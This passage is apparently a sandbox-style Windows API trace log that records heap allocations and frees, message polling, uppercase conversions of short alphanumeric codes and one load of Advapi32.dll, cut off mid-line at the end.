1 [0187.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0187.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0187.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0187.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0187.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0187.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0187.886] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0187.887] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0187.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0187.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0187.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0187.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0187.887] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0187.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0187.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0187.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0187.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0187.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0187.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0187.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.887] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0187.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0187.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0187.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0187.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0187.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0187.888] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0187.888] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0187.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0187.888] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0187.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0187.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0187.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0187.888] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0187.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0187.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0187.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0187.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0187.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0187.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0187.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0187.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.889] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0187.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0187.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0187.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0187.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0187.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0187.889] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0187.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0187.889] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0187.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0187.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0187.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0187.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0187.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0187.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0187.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0187.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0187.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0187.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0187.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0187.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0187.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0187.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0187.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0187.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0187.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0187.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0187.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0187.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0187.891] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0187.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0187.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0187.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0187.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0187.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0187.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0187.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0187.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0187.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0187.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0187.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0187.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0187.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0187.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0187.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.892] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0187.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0187.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0187.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0187.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0187.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0187.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0187.893] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0187.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0187.893] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0187.893] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0187.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0187.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0187.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0187.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c28 [0187.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0187.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0187.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0187.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0187.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0187.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0187.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0187.894] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0187.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0187.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0187.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0187.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0187.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0187.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0187.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0187.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0187.894] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0187.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0187.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0187.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0187.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0187.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0187.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0187.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0187.895] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0187.895] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0187.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0187.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0187.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0187.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0187.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0187.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0187.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0187.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0187.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0187.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0187.895] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0187.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0187.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0187.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0187.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0187.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0187.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0187.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.896] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0187.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0187.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0187.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0187.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0187.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0187.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0187.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0187.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0187.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0187.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0187.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.897] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0187.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0187.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0187.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0187.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0187.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0187.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0187.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0187.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0187.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0187.897] HeapFree (in: 